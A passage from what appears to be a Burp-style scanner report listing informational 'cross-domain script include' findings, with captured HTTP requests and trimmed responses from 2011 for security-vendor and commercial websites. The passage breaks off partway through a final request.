<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.64. http://www.manageengine.com/products/security-manager/download.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/download.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/security-manager/download.html?features HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:28:00 GMT
ETag: "15369-4a1bba9688c00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 86889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script><script id="mstag_tops"type="text/javascript"src="//flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.65. http://www.manageengine.com/products/security-manager/store.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/store.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/security-manager/store.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "b67e-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 46718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceBeginEditable name="head" -->
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.66. https://www.manageengine.com/network-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /network-performance-management.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /network-performance-management.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/service-desk/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:27:38 GMT
ETag: "b11e-49f3716993680"
Accept-Ranges: bytes
Cache-Control: max-age=-2170060
Expires: Thu, 31 Mar 2011 09:27:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 45342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.67. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/security-manager/index.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:51 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=-2247722
Expires: Wed, 30 Mar 2011 11:51:49 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.68. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</ul>
           <script type="text/javascript" src="http://foreign.dt00.net/zones/form4.js"></script>
...[SNIP]...
<!-- mgads banner code begin -->
<script type="text/javascript" src="http://foreign.dt00.net/zones/zone23.php?country=4&amp;region=0"></script>
...[SNIP]...
<!-- START BANNER ZONE 19 //-->
<script type="text/javascript" src="http://foreign.dt00.net/zones/zone19.php?country=4&amp;region=0"></script>
...[SNIP]...
</noscript>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://storage.trafic.ro/js/trafic.js"
>
</script>
...[SNIP]...

23.69. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/products/ecommerce/website-hosting.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/products/ecommerce/website-hosting.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="website-hosting.shtml"
NS_RTIMER_COMPOSITE: 677094517:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:19:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 37989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<!-- Google Analytics code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...

23.70. http://www.outpost24.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjEmMSYyNDI5MzYmMTMwMzczMjgxODc3OCYxMzAzNzMzMDYxNjk3JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:27 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 12630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...

23.71. http://www.outpost24.com/products.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /products.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products.html HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Referer: http://www.outpost24.com/?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjImMiYzNjM4NDYmMTMwMzczMjgxODc3OCYxMzAzNzM2MDY4MzgwJiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:40 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 13355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...

23.72. http://www.stillsecure.com/company/testimonials.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /company/testimonials.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/testimonials.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/library/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.4.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:04 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.73. http://www.stillsecure.com/library/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /library/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /library/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=request-a-trial&product=VAM
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.3.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:03 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.74. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/?c=request-a-trial&product=VAM HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/vam/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.2.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:19 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.75. http://www.stillsecure.com/products.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /products.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/services/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.6.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:08 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network Security Products | Secure Networ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.76. http://www.stillsecure.com/services/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /services/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/index.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.5.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:06 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Managed Security Services | Monitoring |
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.77. http://www.stillsecure.com/vam/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /vam/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vam/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.1.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:10 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Vulnerability Management System | Network
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

23.78. http://www.tresware.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /Static-contact.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Static-contact.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/webcontentmanagementNJ.html
